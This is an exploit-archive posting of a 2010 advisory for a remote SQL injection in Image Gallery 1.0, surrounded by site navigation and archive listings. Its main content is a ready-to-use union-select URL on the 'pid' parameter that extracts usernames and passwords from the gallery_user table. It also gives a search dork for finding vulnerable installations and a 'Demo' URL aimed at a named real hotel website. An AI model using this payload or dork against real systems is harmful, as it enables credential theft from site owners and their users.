Image Gallery 1.0 SQL Injection

Image Gallery 1.0 SQL Injection: Posted Jan 22, 2010; Authored by Hussin X; Image Gallery version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | d42bdf5d0ac5eb33f7e85e93ed95741f18622275c57c12df94cb7552e6ecfb4a; Download | Favorite | View

Image Gallery 1.0 SQL Injection

Image Gallery v1.0 (pid) Remote SQL Injection Vulnerability
___________________________________

Author : Hussin X

Home : IQ-SecuriTY >   www.IQ-TY.com  

Mail  :  darkangel_G85@yahoo.com

___________________________________

script  : http://www.elkagroup.com

DorK : "Powered by : elkagroup.com"

exploit :
_______

http://www.site.com/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--



Demo :
_______

http://www.abbasihotel.com/gallery/property.php?cid=12&uid=0&pid=-168+union+select+1,password,3,4,5,6,7,Username,9,10,11,12,13,14,15,16,17+FROM+gallery_user--


Coding password : mysql

Top Authors In Last 30 Days

Red Hat 190 files
Ubuntu 91 files
Gentoo 28 files
Debian 21 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Amit Roy 4 files
nu11secur1ty 3 files
Aslam Anwar Mahimkar 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,075)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,528)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,258)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,199)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,639)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

Image Gallery 1.0 SQL Injection

Image Gallery 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Image Gallery 1.0 SQL Injection

Share This

Image Gallery 1.0 SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems